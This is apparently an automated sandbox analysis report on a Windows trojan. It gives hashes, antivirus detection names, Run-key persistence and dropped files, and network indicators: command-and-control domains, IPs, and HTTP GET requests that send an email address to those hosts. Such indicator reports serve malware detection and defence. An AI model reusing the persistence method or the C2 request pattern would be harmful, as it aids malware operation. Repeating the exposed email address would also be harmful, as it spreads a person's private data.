Analysis Date: 2015-10-30 21:39:45
MD5: 7ecc6f94246d614efa5098f7aa799e88
SHA1: e950d911586338a58fc5909b9f54065caac6d679

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 5e6d430188db0801642be69ef047d803 sha1: a075cb31c0a9d6f9691b1d4556602cf145a624fd size: 302080
Section .rdata: md5: bc546124435915c8655aabf4a90bae98 sha1: a63c0d1ebabee82e36154d97cd45d506f7073ce4 size: 35840
Section .data: md5: a7d97324045b08e43edeae33cdc9ca3c sha1: 818a646980f821d8bafff13e4501c5930ecda174 size: 88576
Timestamp: 2014-10-30 10:31:41
Packer: Microsoft Visual C++ ?.?
PEhash: a226fa903f678f89981fb78bfefe673ac0d6fbb9
IMPhash: 1339a4c2d29179ebdf6ddafc40cc0bb8
AV Rising: no_virus
AV Mcafee: no_virus
AV Avira (antivir): BDS/Zegost.Gen4
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Downloader-TLD [Trj]
AV Eset (nod32): Win32/Rodecap.BE
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: Trojan ( 004cb2771 )
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.Z
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TSPY_NIVDORT.SMB
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Propagation Input SSDP Extensible ➝ C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\ukvbiwfgs.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.cxqcr
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe"

Network Details:

DNS morningduring.net (Type: A) ➝ 98.139.135.129
DNS amountduring.net (Type: A) ➝ 195.22.26.231
DNS amountduring.net (Type: A) ➝ 195.22.26.252
DNS amountduring.net (Type: A) ➝ 195.22.26.253
DNS amountduring.net (Type: A) ➝ 195.22.26.254
DNS thinknorth.net (Type: A) ➝ 184.168.221.58
DNS oftennorth.net (Type: A) ➝ 208.100.26.234
DNS melbourneit.hotkeysparking.com (Type: A) ➝ 8.5.1.16
DNS middlenorth.net (Type: A) ➝ 64.99.80.30
DNS twelvenorth.net (Type: A) ➝ 192.64.119.26
HTTP GET: http://morningduring.net/index.php?email=oana.busuioc@uti.ro&method=post&len
  User-Agent: (blank)
HTTP GET: http://amountduring.net/index.php?email=oana.busuioc@uti.ro&method=post&len
  User-Agent: (blank)
HTTP GET: http://thinknorth.net/index.php?email=oana.busuioc@uti.ro&method=post&len
  User-Agent: (blank)
HTTP GET: http://oftennorth.net/index.php?email=oana.busuioc@uti.ro&method=post&len
  User-Agent: (blank)
HTTP GET: http://middlegeneral.net/index.php?email=oana.busuioc@uti.ro&method=post&len
  User-Agent: (blank)
HTTP GET: http://middlenorth.net/index.php?email=oana.busuioc@uti.ro&method=post&len
  User-Agent: (blank)
HTTP GET: http://twelvenorth.net/index.php?email=oana.busuioc@uti.ro&method=post&len
  User-Agent: (blank)
Flows TCP: 192.168.1.1:1031 ➝ 98.139.135.129:80
Flows TCP: 192.168.1.1:1032 ➝ 195.22.26.231:80
Flows TCP: 192.168.1.1:1033 ➝ 184.168.221.58:80
Flows TCP: 192.168.1.1:1034 ➝ 208.100.26.234:80
Flows TCP: 192.168.1.1:1035 ➝ 8.5.1.16:80
Flows TCP: 192.168.1.1:1036 ➝ 64.99.80.30:80
Flows TCP: 192.168.1.1:1037 ➝ 192.64.119.26:80

Raw Pcap

Strings